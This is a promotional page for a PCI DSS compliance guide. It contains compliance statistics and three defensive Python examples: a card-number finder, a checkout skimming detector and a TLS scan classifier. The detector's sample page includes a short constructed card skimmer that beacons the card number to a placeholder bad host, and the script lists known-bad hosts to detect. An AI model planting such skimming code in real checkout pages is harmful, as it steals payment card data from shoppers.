Introduction
Unless you live and breathe PCI compliance, it can easily overwhelm, confuse, or downright frustrate you as you attempt to navigate it. Even for those of us who do, there is a lot to keep track of, especially as requirements change and your business grows.
That’s where SecurityMetrics comes in.
Since PCI compliance is a necessity (and frankly, a wise decision), we’re committed to helping you navigate it by simplifying the process, empowering your organization, and protecting your customers. That’s why we’ve created the PCI DSS Compliance Guide. Our guide takes you through all 12 PCI DSS requirements and the SAQ types, and provides step-by-step instructions on how to succeed with PCI.
About the PCI Guide
For 2024, our guide remains one of the best resources to use as you achieve PCI compliance for your organization. It covers each requirement with clarity and thoroughness.
Audit Director Matt Halbleib (CISSP, CISA, QSA) said, "We publish our guide to give businesses of all sizes a tool to understand and organize their PCI compliance efforts. Maintaining PCI compliance in an environment-specific way helps businesses protect their data, detect breaches, and keep cybercriminals off their network."
The guide is a downloadable PDF, so you can easily access and navigate it to stay on top of your PCI progress, step by step.
Topics included in the SecurityMetrics PCI Guide are:
- PCI DSS Version 4
- New Changes To PCI Compliance
- PCI Compliance Trends
- Understanding Your PCI DSS Responsibility
- 12 Requirements of PCI Compliance
- How To Prepare For A Data Breach
- How To Create An Incident Response Plan
- Data Breach Prevention Tools
- PCI Compliance Best Practices
"Businesses who utilize the Guide to PCI DSS Compliance can better organize their compliance efforts and understand the way PCI compliance requirements affect cybersecurity. On top of that, the PCI Guide is a great training tool when assigning new resources to your PCI compliance effort,” said SecurityMetrics VP of Assessments Gary Glover (CISSP, CISA, QSA).
What’s New in the 2024 PCI DSS Guide?
The PCI DSS requirements and the language around them are updated regularly, so we update our guide to match and keep it relevant and useful. With the release of PCI DSS v4.0 and v4.0.1, we have changed a handful of elements to reflect those updates.
A major update that we’ve included in our 2024 guide is more information and tips about implementing v4, especially in the Auditor’s Perspective sections.
There is also a new section we’ve created that includes a detailed list of new PCI DSS v4 requirements, which v4 requirements apply to which SAQ type, and when those requirements need to be implemented by.
In addition, we share several data points from our own scanning and assessment work to help your business avoid the common pitfalls organizations hit as they work to get compliant.
2024 PANscan® Data Analysis
Storage of unencrypted payment card data increases an organization’s risk and liability in the event of a data breach.
Since 2010, SecurityMetrics PANscan® has discovered over 3 billion unencrypted PANs on business networks. In 2023, users scanned over 2,800 computers and 309.65 TB of storage. Here are some key statistics:
- 83.6% of PANscan® users discovered unencrypted PAN data
- 6% stored track data (i.e., the data encoded on the card's magnetic stripe)
- Over 114,468,632 PANs were found
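As an added illustration (this is not SecurityMetrics' PANscan code), the following Python script shows the core of what a PAN discovery scan does: find candidate card numbers in text, reject the ones that fail the Luhn check or do not fit a card brand's prefix and length, and recognize track 1 and track 2 magnetic-stripe formats. The sample text and the brand prefix ranges are constructed for the example, and the script reports only masked numbers.

```python
"""Find unencrypted PANs and magnetic-stripe track data in text.

Added example, not SecurityMetrics' PANscan. Sample text is constructed; brand
ranges are the commonly published IIN ranges.
"""
import re

# Candidate PANs: 13 to 19 digits, optionally separated by single spaces or
# dashes, and not embedded in a longer run of digits.
PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

# Track 2: ;PAN=YYMM<service code><discretionary data>?
TRACK2 = re.compile(r";(\d{13,19})=(\d{4})\d*\?")
# Track 1: %B<PAN>^<NAME>^YYMM<service code><discretionary data>?
TRACK1 = re.compile(r"%B(\d{13,19})\^([^^?]{2,26})\^(\d{4})[^?]*\?")


def luhn_valid(digits):
    """Luhn (mod 10) check; weeds out most order IDs, phone numbers and timestamps."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def card_brand(digits):
    """Brand for common IIN ranges, or None if prefix/length do not look like a card."""
    n = len(digits)
    two, three, four, six = (int(digits[:2]), int(digits[:3]),
                             int(digits[:4]), int(digits[:6]))
    if digits[0] == "4" and n in (13, 16, 19):
        return "Visa"
    if n == 16 and (51 <= two <= 55 or 2221 <= four <= 2720):
        return "Mastercard"
    if n == 15 and two in (34, 37):
        return "American Express"
    if n in (16, 19) and (four == 6011 or two == 65 or 644 <= three <= 649
                          or 622126 <= six <= 622925):
        return "Discover"
    return None


def mask_pan(digits):
    """First six and last four only, the most a PCI DSS report should display."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def scan_text(text):
    """Return (pans, tracks): validated PAN findings and track-data findings, masked."""
    pans = []
    for m in PAN_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        brand = card_brand(digits)
        if brand and luhn_valid(digits):
            pans.append({"brand": brand, "masked": mask_pan(digits), "offset": m.start()})
    tracks = []
    for m in TRACK1.finditer(text):
        tracks.append({"track": 1, "masked": mask_pan(m.group(1)),
                       "expiry": m.group(3), "offset": m.start()})
    for m in TRACK2.finditer(text):
        tracks.append({"track": 2, "masked": mask_pan(m.group(1)),
                       "expiry": m.group(2), "offset": m.start()})
    return pans, tracks


# Constructed sample: a log fragment mixing card data with numeric decoys.
SAMPLE_TEXT = """order 10045 card 4111 1111 1111 1111 exp 12/25
customer 77 mc 5555555555554444 callback 555-0199
invoice 2024-000001 ref 1234567890123
swipe log: ;378282246310005=25121010000012345678?
"""

if __name__ == "__main__":
    found_pans, found_tracks = scan_text(SAMPLE_TEXT)
    for f in found_pans:
        print("PAN    ", f["brand"], f["masked"], "at offset", f["offset"])
    for f in found_tracks:
        print("TRACK", f["track"], f["masked"], "exp", f["expiry"], "at offset", f["offset"])
```

Feed scan_text() the contents of files, database exports, or log dumps decoded as text; those are the places stored PANs usually turn up, and the Luhn and brand checks keep invoice numbers and phone numbers out of the results.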
SecurityMetrics Shopping Cart Inspect helps businesses detect if their shopping cart has been breached.
With the help of Shopping Cart Inspect, SecurityMetrics Forensic Analysts review businesses’ rendered webpage code on their shopping cart URL to collect evidence of a skimming attack.
- 92.4% of Shopping Cart Inspect reviews identified malicious, suspicious, and/or concerning issues on the ecommerce sites researched.
- 2.44 issues: Average number of issues identified per Shopping Cart Inspect review.
Percentage of inspected ecommerce sites with each class of issue (a site can fall into more than one class):
- 7.4% had malicious issues.
- 80.2% had suspicious issues.
- 53.5% had concerning issues.
Percentage of all issues discovered, by class:
- 3.70% of issues were malicious.
- 68.26% of issues were suspicious.
- 28.04% of issues were concerning.
Issue classes:
- Malicious: Evidence of card data being stolen (highest threat level).
- Suspicious: Identified issues increase the probability of a potential exploit (medium threat level).
- Concerning: An unlikely route to a breach, but the identified issues could lead to a potential exploit (low threat level).
Top 5 Malicious Issues Found
- Malicious Double Checkout: Credit card data is posted twice, with the second post going to an alternate checkout page on the merchant's server.
- Malicious Post: A script on the page posts data to a known bad site.
- Malicious JavaScript: JavaScript on the page appears to be acting maliciously, such as harvesting credit card numbers or other sensitive data.
- Form Jacking: The authorized payment web form has been replaced by a counterfeit.
- Directory Browsing Enabled: Directory browsing is enabled on the web pages analyzed.
Top 5 Suspicious Issues Found
- JavaScript Issue: Out-of-date JavaScript libraries carry known vulnerabilities that can be exploited in future attacks.
- Ads/Business Intelligence: Advertising or analytics content is being pulled into the checkout pages under review. It can become a source of intermittent card data loss through drive-by malvertising.
- Out-of-date CMS: Out-of-date web components. Unpatched or un-updated software is a leading cause of sites losing sensitive data.
- Configuration Issue: Required web server security headers are missing.
- Suspicious Double Checkout: Credit card data is posted twice, returning to the merchant's own checkout page on the server. This practice could affect the security of the site and should be reviewed against business needs.
Top 5 Concerning Issues Found
- Configuration Vulnerability: A configuration item on the website or web server does not follow security best practices.
- Checkout Configuration Issue: Aspects of the checkout process may not follow security best practices and could leave the merchant vulnerable to certain types of attacks.
- Mixed HTTP/HTTPS: Content is loaded over HTTP on an HTTPS page, which defeats the protection TLS is meant to give that page. In severe cases, an attacker on the network path can exploit this to view privileged content.
- HTTP Header Issue: Improperly configured HTTP headers can give attackers specific information about the web server setup, such as vulnerable software versions.
- SPAM Watch: The domain has been flagged by spam-tracking communities, which may indicate that bad actors are using its email server to send malicious messages.
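To make the three tiers concrete, here is an added Python example (not SecurityMetrics' Shopping Cart Inspect tooling) that triages the rendered HTML of a checkout page and its response headers for several of the finding types above: an ads/analytics script in the payment flow, a script loaded over HTTP on an HTTPS page, a payment form or inline script sending data to a known bad host, missing security headers, and a Server header that discloses a version. The page, headers, trusted-processor list and known-bad list are constructed placeholders under .test; in practice the last two would be the merchant's allow list of payment providers and a threat-intelligence feed.

```python
"""Triage a rendered checkout page for skimming indicators.

Added example, not SecurityMetrics' tooling. All hosts and lists below are
constructed placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

TRUSTED_PAYMENT_HOSTS = {"cdn.example-payments.test"}   # merchant's allow list (placeholder)
AD_ANALYTICS_HOSTS = {"tag.example-analytics.test"}     # tracker list (placeholder)
KNOWN_BAD_HOSTS = {"collector.example-bad.test"}        # threat feed (placeholder)
REQUIRED_HEADERS = ("content-security-policy", "strict-transport-security",
                    "x-content-type-options", "x-frame-options")
URL_IN_SCRIPT = re.compile(r"""https?://[A-Za-z0-9.-]+(?::\d+)?[^\s'"`]*""")
SEVERITY_RANK = {"malicious": 3, "suspicious": 2, "concerning": 1}


class _PageCollector(HTMLParser):
    """Collect external script sources, form actions and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.scripts, self.forms, self.inline = [], [], []
        self._buf = None                      # accumulates one inline <script> body

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.scripts.append(a["src"])
            else:
                self._buf = []
        elif tag == "form":
            self.forms.append(a.get("action") or "")

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def _first_party(host, page_host):
    """Same host, a subdomain of it, or a relative/javascript: URL (host is None)."""
    return host is None or host == page_host or host.endswith("." + page_host)


def _third_party(host, page_host):
    return not _first_party(host, page_host) and host not in TRUSTED_PAYMENT_HOSTS


def triage(page_url, html, headers):
    """Return unique (severity, issue, detail) findings using the page's three tiers."""
    page = urlparse(page_url)
    col = _PageCollector()
    col.feed(html)
    col.close()
    findings = []

    for src in col.scripts:
        u = urlparse(urljoin(page_url, src))
        if page.scheme == "https" and u.scheme == "http":
            findings.append(("concerning", "Mixed HTTP/HTTPS", "script over HTTP: " + src))
        if u.hostname in KNOWN_BAD_HOSTS:
            findings.append(("malicious", "Malicious JavaScript", "script from known bad host " + u.hostname))
        elif u.hostname in AD_ANALYTICS_HOSTS:
            findings.append(("suspicious", "Ads/Business Intelligence", u.hostname + " loaded in checkout"))
        elif _third_party(u.hostname, page.hostname):
            findings.append(("suspicious", "JavaScript issue", "unrecognized third-party script " + u.hostname))

    for action in col.forms:
        u = urlparse(urljoin(page_url, action))
        if u.hostname in KNOWN_BAD_HOSTS:
            findings.append(("malicious", "Form Jacking", "payment form posts to " + u.hostname))
        elif _third_party(u.hostname, page.hostname):
            findings.append(("suspicious", "Checkout Configuration Issue", "form posts off-host to " + u.hostname))

    for body in col.inline:
        for url in URL_IN_SCRIPT.findall(body):
            h = urlparse(url).hostname
            if h in KNOWN_BAD_HOSTS:
                findings.append(("malicious", "Malicious Post", "inline script sends data to " + h))
            elif _third_party(h, page.hostname):
                findings.append(("suspicious", "JavaScript issue", "inline script contacts " + h))

    lower = {k.lower(): v for k, v in headers.items()}
    missing = [h for h in REQUIRED_HEADERS if h not in lower]
    if missing:
        findings.append(("suspicious", "Configuration Issue", "missing security headers: " + ", ".join(missing)))
    if re.search(r"\d", lower.get("server", "")):
        findings.append(("concerning", "HTTP Header Issue", "Server header discloses version: " + lower["server"]))

    return list(dict.fromkeys(findings))      # drop exact duplicates, keep order


def worst(findings):
    """Highest tier present, or 'clean' when there are no findings."""
    return max((s for s, _, _ in findings), key=SEVERITY_RANK.get, default="clean")


# Constructed sample page: one trusted processor script, one script over HTTP,
# one analytics tag, and a jacked form plus beacon to a known bad host.
PAGE_URL = "https://shop.example.com/checkout"
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example-payments.test/hosted-fields.js"></script>
<script src="http://static.shop.example.com/js/checkout.js"></script>
<script src="https://tag.example-analytics.test/pixel.js"></script>
</head><body>
<form id="payment" action="https://collector.example-bad.test/save.php" method="post">
<input name="cc_number"><input name="cc_cvv"></form>
<script>
document.getElementById("payment").addEventListener("submit", function () {
  var pan = document.querySelector("[name=cc_number]").value;
  navigator.sendBeacon("https://collector.example-bad.test/b", pan);
});
</script>
</body></html>"""
SAMPLE_HEADERS = {"Server": "Apache/2.4.29", "Content-Type": "text/html; charset=utf-8",
                  "Strict-Transport-Security": "max-age=31536000"}

if __name__ == "__main__":
    for sev, issue, detail in triage(PAGE_URL, SAMPLE_HTML, SAMPLE_HEADERS):
        print(f"{sev:11} {issue}: {detail}")
```

The page must be the rendered DOM (what a browser executes), not the raw server response: skimmers are routinely injected by a script that runs after load, so capture the HTML from a headless browser before feeding it to triage().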
PCI Compliance Data
2023 SecurityMetrics Customer Trends
- 90.4% of SecurityMetrics customers that started their SAQ have achieved a passing status
- 22 days: Average time to reach PCI DSS compliance
- 1.02 times: Average number of support incidents before customers became compliant
- 79.21%: Percentage of SecurityMetrics customers that passed their first scan
- 6 days: Average time from finished first scan to first passing scan
- 1.3 scans: Average number of times scanned until merchants pass their PCI scan
Top 10 Failing Self-Assessment Questionnaire (SAQ) Sections
We reviewed our merchant database for the 10 SAQ sections where SecurityMetrics merchant customers most often fall short of compliance. Starting with the least adopted requirement, these are the results:
- Requirement 12.1: Establish, publish, maintain, and disseminate a security policy.
- Requirement 12.10.1: Create an incident response plan to be implemented in the event of a system breach.
- Requirement 12.2: Verify that an annual risk-assessment process is documented that identifies critical assets, threats, and vulnerabilities, and results in a formal, documented analysis of risk.
- Requirement 12.8.4 (service providers): Maintain a program to monitor service providers’ PCI DSS compliance status at least annually.
- Requirement 12.5.3: Establish, document, and distribute security incident response and escalation procedures to ensure timely and effective handling of all situations.
- Requirement 12.5.4: Administer user accounts, including additions, deletions, and modifications.
- Requirement 12.5.5: Monitor and control all access to data.
- Requirement 12.6.a (awareness program): Implement a formal security awareness program to make all personnel aware of the cardholder data security policy and procedures.
- Requirement 12.8.5 (requirement management): Maintain information about which PCI DSS requirements are managed by each service provider, and which are managed by the entity.
- Requirement 12.1.1: Review the security policy at least annually and update the policy when the environment changes.
Top 5 Failed Vulnerabilities from Vulnerability Scans
- SSL Self-Signed Certificate: The service presents an identity certificate that the organization created, signed, and certified itself rather than one issued by a trusted certificate authority (CA)
- TLS version 1.1 protocol detection: The remote service accepts connections using TLS 1.1
- TLS version 1.0 protocol detection: The remote service accepts connections using TLS 1.0
- SSL 64-bit Block Size Cipher Suites Supported (Sweet32): The remote host supports one or more cipher suites that use a block cipher with 64-bit blocks, such as 3DES
- SSL certificate with the wrong hostname: The certificate presented by the tested service was issued for a different host name than the one being tested
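All five of these findings can be decided from a handshake and the certificate the server presents. The following added Python example (not SecurityMetrics' scanner) classifies an endpoint from data in the shape Python's ssl module returns (version strings as from SSLSocket.version(), cipher names as from SSLSocket.cipher(), and the certificate dict as from getpeercert()), implements the host-name matching rule behind the "wrong hostname" finding, and includes a small live probe for the TLS 1.0/1.1 findings that only runs when you call it. The sample certificate, versions and cipher list are constructed.

```python
"""Classify a TLS endpoint against the five vulnerability-scan findings above.

Added example, not SecurityMetrics' scanner. Sample inputs are constructed.
"""
import socket
import ssl

# DES/3DES, IDEA and RC2 all use 64-bit blocks; AES, ChaCha20 and Camellia do not.
BLOCK64_MARKERS = ("DES", "IDEA", "RC2")


def is_64bit_block_suite(name):
    """True for OpenSSL names (DES-CBC3-SHA) and IANA names (TLS_RSA_WITH_3DES_EDE_CBC_SHA)."""
    return any(m in name.upper() for m in BLOCK64_MARKERS)


def _dn_value(dn, key):
    """Pull one attribute (e.g. commonName) out of a getpeercert()-style DN tuple."""
    for rdn in dn:
        for k, v in rdn:
            if k == key:
                return v
    return None


def cert_names(cert):
    """Names a client may match: SAN DNS entries, or the CN only when there is no SAN."""
    names = [v for k, v in cert.get("subjectAltName", ()) if k == "DNS"]
    if not names:
        cn = _dn_value(cert.get("subject", ()), "commonName")
        names = [cn] if cn else []
    return names


def name_matches(pattern, hostname):
    """RFC 6125-style comparison: case-insensitive; wildcard only as the whole leftmost label."""
    pattern, hostname = pattern.lower().rstrip("."), hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    # *.example.com is fine; *.com, pa*.example.com and *.*.example.com are rejected
    if p_labels[0] != "*" or "*" in pattern[1:] or len(p_labels) < 3:
        return False
    return len(p_labels) == len(h_labels) and p_labels[1:] == h_labels[1:]


def is_self_signed(cert):
    """Issuer identical to subject: nobody but the server itself vouches for the key."""
    return cert.get("subject") is not None and cert.get("subject") == cert.get("issuer")


def classify(versions_accepted, cipher_suites, cert, hostname):
    """Return the titles of the scan findings above that apply to this endpoint."""
    findings = []
    if "TLSv1" in versions_accepted:
        findings.append("TLS version 1.0 protocol detection")
    if "TLSv1.1" in versions_accepted:
        findings.append("TLS version 1.1 protocol detection")
    if any(is_64bit_block_suite(c) for c in cipher_suites):
        findings.append("SSL 64-bit Block Size Cipher Suites Supported (Sweet32)")
    if is_self_signed(cert):
        findings.append("SSL Self-Signed Certificate")
    if not any(name_matches(n, hostname) for n in cert_names(cert)):
        findings.append("SSL certificate with the wrong hostname")
    return findings


def probe_legacy_versions(host, port=443, timeout=5):
    """Attempt TLS 1.0 and TLS 1.1 handshakes; return the versions the server accepted.
    OpenSSL 3 at its default security level will not even offer these versions, so the
    probe lowers the local floor with SECLEVEL=0; any failure counts as 'not accepted'."""
    accepted = set()
    for version in (ssl.TLSVersion.TLSv1, ssl.TLSVersion.TLSv1_1):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE       # probing protocol support, not trust
        try:
            ctx.set_ciphers("DEFAULT:@SECLEVEL=0")
            ctx.minimum_version = version
            ctx.maximum_version = version
            with socket.create_connection((host, port), timeout=timeout) as sock:
                with ctx.wrap_socket(sock, server_hostname=host) as tls:
                    accepted.add(tls.version())
        except (ssl.SSLError, OSError, ValueError):
            pass
    return accepted


# Constructed sample in the shape ssl.SSLSocket.getpeercert() returns.
SAMPLE_CERT = {
    "subject": ((("countryName", "US"),), (("commonName", "shop.example.com"),)),
    "issuer": ((("countryName", "US"),), (("commonName", "shop.example.com"),)),
    "subjectAltName": (("DNS", "shop.example.com"), ("DNS", "*.shop.example.com")),
}
SAMPLE_VERSIONS = {"TLSv1", "TLSv1.1", "TLSv1.2"}
SAMPLE_CIPHERS = ["ECDHE-RSA-AES128-GCM-SHA256", "DES-CBC3-SHA"]

if __name__ == "__main__":
    for finding in classify(SAMPLE_VERSIONS, SAMPLE_CIPHERS, SAMPLE_CERT, "pay.example.com"):
        print("FAIL:", finding)
```

The wildcard rules in name_matches() are why a certificate for *.shop.example.com does not cover pay.example.com or shop.example.com itself; many "wrong hostname" scan failures come from exactly that assumption.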
What Readers Are Saying About the PCI Guide
“I needed quick and straightforward guidance on how the PCI DSS requirements apply to software development. I was able to quickly find what I needed, written in a way that was both quickly digestible and highly understandable. This resolved the concerns we had and reinforced the importance of the standardization of process controls we are putting in place.”
“This is a fantastic guide for merchants on any level to work towards becoming PCI compliant; it also serves as a great resource to train future hires!”
“Excellent guide to PCI compliance which provides a manageable template to develop internal policies and procedures.”
“The SecurityMetrics Guide was very comprehensive and definitely extremely useful. I especially benefited from the IT checklist guide.”
“SecurityMetrics Guide to PCI DSS Compliance is a one-stop guide to ensuring your organization is PCI DSS compliant. This is the best comprehensive guide I've found.”
“Made us aware of a lot of details concerning our security . . . also our service provider responsibilities, which we were not aware of. Provided us with valuable tips for firewalls and explained a lot of terminology that was unknown before PCI DSS.”
Conclusion
The PCI DSS is a security standard that provides an organized and comprehensive framework for any environment. It includes specific SAQs, selected according to variables such as how a company accepts payment information. Each SAQ narrows the requirements to the areas a business of that type needs to address to start its data security program, which can save time and money.
The 2024 guide remains a vital tool for any business that wants to simplify its PCI compliance process and needs help navigating it. Remember that with both v4.0 and v4.0.1 now in effect, you’ll need to implement and update any aspect of your company’s security that doesn’t fall in line with them.